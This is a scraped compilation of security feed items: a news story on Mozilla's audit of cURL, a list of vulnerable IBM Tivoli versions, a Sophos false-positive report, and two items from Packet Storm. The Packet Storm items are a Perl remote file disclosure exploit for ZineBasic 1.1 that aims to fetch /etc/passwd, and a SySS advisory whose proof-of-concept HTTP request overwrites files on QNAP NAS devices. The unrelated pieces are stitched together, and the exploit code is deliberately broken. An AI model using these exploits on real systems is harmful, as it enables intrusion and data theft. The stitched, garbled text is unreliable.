File

Mozilla has given the widely-used cURL file transfer library a thumbs up in a security audit report that uncovered nine vulnerabilities.

Of those found in the free security review were four high severity vulnerabilities leading to potential remote code execution, and the same number of medium risk bugs. One low risk man-in-the-middle TLS flaw was also uncovered.

A medium case insensitivity credential flaw in ConnectionExists() comparing passwords with strequal() was not fixed given the obscurity and difficulty of the attack.

The remaining bugs were shuttered in seven patches after two vulnerabilities were combined in the largest cURL fix to date.

More fixes are on the way, cURL lead developer and Mozilla engineer Daniel Stenberg says.

"While working on the issues one-by-one to have them fixed we also ended up getting an additional four security issues to add to the set [from] three independent individuals," Stenberg says.

"All these issues [made for] a really busy period and … I could get a short period of relief until the next tsunami hits."

Five Mozilla engineers from the Berlin-based Cure53 team which conducted the 20-day source code audit.

"Sources covering authentication, various protocols, and, partly, SSL/TLS, were analysed in considerable detail. A rationale behind this type of scoping pointed to these parts of the cURL tool that were most likely to be prone and exposed to real-life attack scenarios," the team wrote in the [PDF].

"At the same time, the overall impression of the state of security and robustness of the cURL library was positive."

Stenberg says he applied for the audit fearing a recent run of security vulnerability reports may have pointed to undiscovered underlying problems.

The report was finished 23 September and fixes produced over the ensuing months.

The developer says fewer checks and possible borked patches may result from the decision to audit in secret.

"One of the primary [downsides] is that we get much fewer eyes on the fixes and there aren’t that many people involved when discussing solutions or approaches to the issues at hand," Stenberg says.

"Another is that our test infrastructure is made for and runs only public code [which] can’t really be fully tested until it is merged into the public git repository." ®

Audit vulnerabilities:

  • CRL -01-021 UAF via insufficient locking for shared cookies ( High)
  • CRL -01-005 OOB write via unchecked multiplication in base 64_ encode () ( High)
  • CRL -01-009 Double - free in krb 5 read _ data () due to missing realloc () check ( High)
  • CRL -01-014 Negative array index via integer overflow in unescape _ word () ( High)
  • CRL -01-001 Malicious server can inject cookies for other servers ( Medium)
  • CRL -01-007 Double - free in aprintf () via unsafe size _t multiplication ( Medium)
  • CRL -01-013 Heap overflow via integer truncation ( Medium)
  • CRL -01-002 ConnectionExists () compares passwords with strequal () ( Medium)
  • CRL -01-011 FTPS TLS session reuse ( Low)

Sponsored: The state of mobile security maturity


The Register - Security

Vulnerable: IBM Tivoli Storage Productivity Center 5.2.10
IBM Tivoli Storage Productivity Center 5.2.6
IBM Tivoli Storage Productivity Center 5.2.5
IBM Tivoli Storage Productivity Center 5.2.2
IBM Tivoli Storage Productivity Center 5.2.1 0
IBM Tivoli Storage Productivity Center 5.2
IBM Tivoli Storage Productivity Center 5.2.7.1
IBM Tivoli Storage Productivity Center 5.2.7
IBM Tivoli Storage Productivity Center 5.2.5.1
IBM Tivoli Storage Productivity Center 5.2.4.1
IBM Tivoli Storage Productivity Center 5.2.4
IBM Tivoli Storage Productivity Center 5.2.3
IBM Tivoli Storage Productivity Center 5.2.1.1
IBM Spectrum Control 5.2.9
IBM Spectrum Control 5.2.8
IBM Spectrum Control 5.2.10.1


SecurityFocus Vulnerabilities

# Title: ZineBasic 1.1 Remote File Disclosure Exploit
# Author: bd0rk || East Germany former GDR
# Tested on: Ubuntu-Linux
# Vendor: http://w2scripts.com/news-publishing/
# Download: http://downloads.sourceforge.net/project/zinebasic/zinebasic/v1.1/zinebasic_v1.1_00182.zip?r=https%3A%2F%2Fsourceforge.net%2Fprojects%2Fzinebasic%2F&ts=1474313108&use_mirror=master
# Twitter: twitter.com/bd0rk

#Greetings: zone-h.org, Curesec GmbH, SiteL GmbH, i:TECS GmbH, rgod, GoLd_M
----------------------------------------------------------------------------------
=> Vulnerable sourcecode in /zinebasic_v1.1_00182/articleImg/delImage.php line 12

=> Vulnerable snippet: $ id = $ _GET['id'];

----------------------------------------------------------------------------------

Exploitcode with little error inline 25-->'Gainst script-kiddies! || Copy&Paste:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/usr/bin/perl
use LWP::Simple;
use LWP::UserAgent;
sub ex()

print "Usage: perl $ 0 someone.com /ZineBasic_Dir/\n";
print "\nZineBasic 1.1 Remote File Disclosure Exploit\n";
print "\ Contact: twitter.com/bd0rk\n";
($ host, $ path, $ under, $ file,) = @ARGV;
$ under="/articleImg/";
$ file="delImage.php?id=[REMOTE_FILE]";
my $ target = "http://".$ host.$ path.$ under.$ file;
my $ usrAgent = LWP::UserAgent->new();
my $ request = $ usrAgent->get($ target,":content_file"=>"[REMOTE_FILE]");
if ($ request->is_success)
{
print "$ target <= JACKPOT!\n\n";
print "etc/passwd\n";
exit();

else

print "Exploit $ target FAILED!\n[!].$ request->status_line.\n";
exit();


Exploit Files ≈ Packet Storm

USN-3074-1: File Roller vulnerability | Ubuntu

Jump to site nav

  • Jump to content
  • Cloud
    • Overview
    • Ubuntu OpenStack
    • Public cloud
    • Cloud tools
    • Cloud management
    • Ecosystem
    • Cloud labs
  • Server
    • Overview
    • Server management
    • Hyperscale
  • Desktop
    • Overview
    • Features
    • For business
    • For developers
    • Take the tour
    • Desktop management
    • Ubuntu Kylin
  • Phone
    • Overview
    • Features
    • Scopes
    • App ecosystem
    • Operators and OEMs
    • Carrier Advisory Group
    • Ubuntu for Android
  • Tablet
    • Design
    • Operators and OEMs
    • App ecosystem
  • TV
    • Overview
    • Experience
    • Industry
    • Contributors
    • Features and specs
    • Commercial info
  • Management
    • Overview
    • Landscape features
    • Working with Landscape
    • Return on investment
    • Compliance
    • Ubuntu Advantage
  • Download
    • Overview
    • Cloud
    • Server
    • Desktop
    • Ubuntu Kylin
    • Alternative downloads


Ubuntu Security Notices

Sophos rushed to release an update over the weekend after system administrators started complaining that the security firm’s products had flagged a legitimate Windows file as malicious.

Users of Sophos Home, UTM, Central and Enterprise Console products were notified that the Troj/FarFli-CT malware was detected in C:WindowsSystem32winlogon.exe, a component of the Windows login system.

Winlogon.exe is known to be abused by malware, but an error in one of Sophos’ endpoint protection verification systems caused products to detect the file as a threat even without the presence of an infection, leading to blue or black screens in some cases.

According to Sophos, the false positive affected a specific 32-bit version of Windows 7 SP1. The vendor said it had released a fix within hours after learning about the problem.

“Based on current case volume and customer feedback, we believe the number of impacted systems to be minimal and confined to a small number of cases,” Sophos said. “The most common impact to our customer base is that some administrators may need to clear several erroneous alerts from their administrator consoles.”

After the fix is applied, affected users might have to clear the false positive alerts in their product’s console.

Some affected customers took their frustration to Twitter where they complained about the impact of this incident and the long waiting times for reaching the security firm’s tech support.

Problematic false positives and updates are not uncommon. In the past years, such issues hit companies such as Microsoft, Panda Security and Norton. In one of the more recent incidents, an update released by ESET for home and business products prevented users from accessing many popular websites, including eBay, Amazon and Google.

A study conducted last year by Damballa showed that erroneous malware alerts cost organizations roughly $ 1.3 million per year.

Related Reading: Hunting the Snark with Machine Learning, Artificial Intelligence, and Cognitive Computing

Related Reading: VirusTotal Starts Marking Trusted Files to Reduce False Positives

Related Reading: VirusTotal Policy Change Rocks Anti-Malware Industry

view counter

Previous Columns by Eduard Kovacs:

Tags:


SecurityWeek RSS Feed

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2016-053
Product: QNAP QTS
Manufacturer: QNAP
Affected Version(s): 4.2.1 Build 20160601
Tested Version(s): 4.2.1 Build 20160601 - 4.2.2 Build 20160812
Vulnerability Type: Arbitrary file overwrite (CWE-23)
Risk Level: High
Solution Status: unfixed
Manufacturer Notification: 2016-06-06
Solution Date: tbd.
Public Disclosure: 2016-08-18
CVE Reference: Not assigned
Author of Advisory: Sebastian Nerz (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

QTS is the operating system used by manufacturer QNAP on its series of
NAS devices[1].

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The SySS GmbH found an vulnerability in the user configuration interface
of the QTS management webapplication, allowing an authenticated user to
overwrite arbitrary files in /tmp and its subdirectories.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

1. Log in to the QNAP. The user needs no special privileges.
2. Run a request like the following:

==
POST /cgi-bin/userConfig.cgi?imbgName=[newNameToOverwrite]&func=uploadBgImg&sid=[sid] HTTP/1.1
Host: [IP of the QNAP]:8080
Content-Type: multipart/form-data;boundary=foo
Content-Length: 115

foo
Content-Disposition: form-data; name="filename"; filename="foo.txt"
Content-Type: non-image-jpeg

asdf
foo--

==
3. The uploaded file will be written to /tmp/[newNameToOverwrite] allowing overwriting e.g. crontabs, PID-files and similar files.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The manufacturer has not released any security update or patch so far.
Administrators of QNAP QTS 4.2 installations should ensure that only
trusted users/administrators have access to the QNAP or the required
permissions to update their profile.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2016-06-06: Vulnerability discovered and reported to manufacturer
2016-06-20: Vulnerability report confirmed by manufacturer
2016-07-06: Manufacturer asked for timeline regarding a fix
2016-07-18: Manufacturer reminded about upcoming public disclosure
2016-08-18: Public disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for QNAP QTS
http://www.qnap.com/qts/4.2/en/
[2] SySS Security Advisory SYSS-2016-053
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-053.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

Security vulnerability found by Sebastian Nerz of the SySS GmbH.

E-Mail: [email protected]
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sebastian_Nerz.asc
Key ID: 0x9180FDB2
Key Fingerprint: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQEcBAEBCgAGBQJXtWVnAAoJENEtJqSRgP2yJOsIAIK6uglJJlCsfk4ZQR/3b0UH
A1MAMDS4EMrW6+4CX5SS+69KHYpXYCGf4jvniEiFtMYyBrkVTVB1DdxWZXAsSVR4
TI/xeWL2ltp1Kjt5uWiDZ41haoeuHCqWd0wB4+L3pQnOqtGi+THMBTt7s0dF3bPX
x0r0qiDmDRR/CikePvw06igwEAJl3+1AxvawHhqCqAkNLQaCT4nzjheYqGhQxXmJ
WWi1kKfWLDc684sjCf0kl0Cldzqw+dw2yx7aa/gderWxI/VwMYO7mZwGcvHQjqSq
MTKH6tbMJ9agLoU2fzJCnk/d5QHk52Rtxu0DPjUl2/7CpFaxyhFE3R/0AKn6Wyw=
=MtKH
-----END PGP SIGNATURE-----


Exploit Files ≈ Packet Storm